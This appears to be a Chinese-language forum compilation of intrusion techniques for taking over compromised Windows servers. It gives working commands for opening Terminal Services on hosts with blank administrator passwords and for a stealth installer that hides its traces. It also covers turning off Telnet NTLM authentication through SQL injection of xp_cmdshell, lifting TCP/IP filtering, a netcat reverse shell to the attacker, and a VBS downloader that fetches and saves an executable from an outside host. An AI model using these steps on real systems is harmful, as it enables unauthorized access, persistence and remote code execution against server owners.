c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。

3，下载3389自动安装程序-djshao正式版5.0
说明：
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下，然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！

特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！

5，下载DameWare NT Utilities 3.66.0.0 注册版
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK

==============================================================
终端服务器超出了最大允许连接数的解决办法
1、首先你可以telnet到此主机上(不管你用哪种方法)，当然如果能直接操作机器更好，不过直接操作就不必用命令行了，用控制台更直观，这里不是我们讲述的问题，略过。
2、Telnet上去后,先看登陆的用户：
输入命令：query user
系统返回：
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator console   0 运行中 . 2004-10-09 15:37
user1 UserMachine1   1 运行中 . 2004-10-09 15:37
user2                 12 已断开 无 2004-10-09 15:37

此时可以看出的可能根我们的不一样，根据具体情况而定。
看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中，后者已经断开了,但是断开了仍然占用系统资源和通道，我们要把它踢掉。如下进行操作即可。

输入命令：logoff 12

C:\>query user //再看看
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
administrator console 0 运行中 . 2004-10-09 15:37
user1 UserMachine1   1 运行中 . 2004-10-09 15:37

3、如果服务器关闭了telnet功能（这是默认的），还可以通过SqlServer的xp_cmdshell扩展存储过程，使用格式：master.dbo.xp_cmdshell '命令内容'，其余可参考第二步。此方式要求有访问xp_cmdshell的权限。

mstsc /console /v:IP:终端端口    T管理

==============================================================
对于Telnet的HTLM身份验证的突破方法总结
By:独孤依人[SST]
对于Telnet的HTLM身份验证的突破方法常用以下四种方法：

1、新建用户法
telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新建的帐号和密码，telnet对方ip，直接可以登陆对方电脑了。 这种方法我以前常用的，实用性较强

2、命令法
那就是直接运行命令：tlntadmn config sec = -ntlm

注射的话可以直接运行：;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证：）

3、上传ntml.exe法
这种方法有很多缺点，比如：对方有杀毒软件，网段屏蔽了TFTP等等.

4、telnet配置信息写入法
直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。

对于Telnet的HTLM身份验证的突破方法用1或2中方法就可解决！
==============================================================
解除TCP/IP筛选 的方法总结
TCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项

然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可

附：
解除TCP/IP限制的小技巧
作者：河马史诗　　http://www.wrsky.com

1.用NC反弹得到一个shell

本机监听 NC -l -p 32

WEBSHELL运行：

x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"

得到一个shell

2.CMD下导出注册表文件
C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser
vices\Tcpip

C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

修改各文件 EnableSecurityFilters 处
将最后的1改为0

3.将注册表文件导入
x:\xxx>regedit -s 1.reg
x:\xxx>regedit -s 2.reg
x:\xxx>regedit -s 3.reg
-S 为无提示

重启命令 iisreset /reboot

完成TCP/IP筛选限制
============================================================
xp_cmdshell新的恢复办法
xp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshel
=============================================================
文件上传方法汇总
文件上传是很早以前的事了，最早那会常用的就是IPC连接，然后一个一个的COPY，自从动网upfile漏洞出来以后，各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出，原理都是大同小异，没有过滤文件上传路径，导致可以抓包然后把空格20改成00，变成空字符NULL，系统是从右往左识别的，所以到空字符那就截断了，更简单的就是过滤文件上传类型不完整，改后缀就可以解决了，这些上传文件的漏洞，用万能上传工具就可以轻松搞定，不过漏洞文件名不同罢了。
还有一些另类的文件上传方法，是在系统做了比较好的防范下完成的，资料来源感谢CD-LION提供一。
先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.
copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已复制一个文件
启动它 d:\downloads\winzip32\winshell.exe 浏览器窗口会停好久,
不用等的,程序已经启动了,点停止,接着,
断开共享连接: net use \\myIP\c$ /del 完成
1利用telnet上传文件 by :jiangyf@usa.net

如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢?
方法很简单:
1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子:
begin 644 file.bat
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%]J
M95@T85!9+7@M04%28#!@*CTP,'500D])04%!049+04]"4$E$34-"04Q%04I-
M3D-"2D%,24%!14U-3D-"1D5'24=&0T%%3D="1T1(0T=02$='2DA#2$9(1$-!
M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@``
`
end
sum -r/size 17903/262
全部都是可见的ASCII字符了

2.用TELNET连接到主机后输入
$ cat >a 
然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口
按^d
在当前目录下产生文件a
3.uudecode a
文件复原,然后chmod即可

3脚本是非常好的东西，只要把源码保存到一个文件中就能运行。所以在shell下，用
echo语句直接写到一个文件中，在用相应的解释程序执行就可以啦。这里是一个程序
实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs
echo xPost.Open "GET","http://167168.meibu.com/sr...,0 >>167168.vbs
echo xPost.Send() >>167168.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs
echo sGet.Mode = 3 >>167168.vbs
echo sGet.Type = 1 >>167168.vbs
echo sGet.Open() >>167168.vbs
echo sGet.Write(xPost.responseBody) >>167168.vbs
echo sGet.SaveToFile "srv.exe",2 >>167168.vbs
然后执行cscript 167168.vbs就可以啦.其中，http://167168.meibu.com/sr...改成你放
文件的网站路径，srv.exe可以改成保存文件的路径。

4.start its:http://167168.meibu.com/ca... （看清楚，小心论坛自动加的标签）
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" （假设系统装在c盘，且当前环境是SYSTEM。如果是用户环境，修改Default User为该用户名）
dir /s ca[1].rar
然后会显示ca[1].rar的具体位置，比如C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5QMVC11H\ca[1].rar
最后：
copy 0QMVC11H\ca[1].rar c:\winnt\system32\ca.rar
del 0QMVC11H\ca[1].rar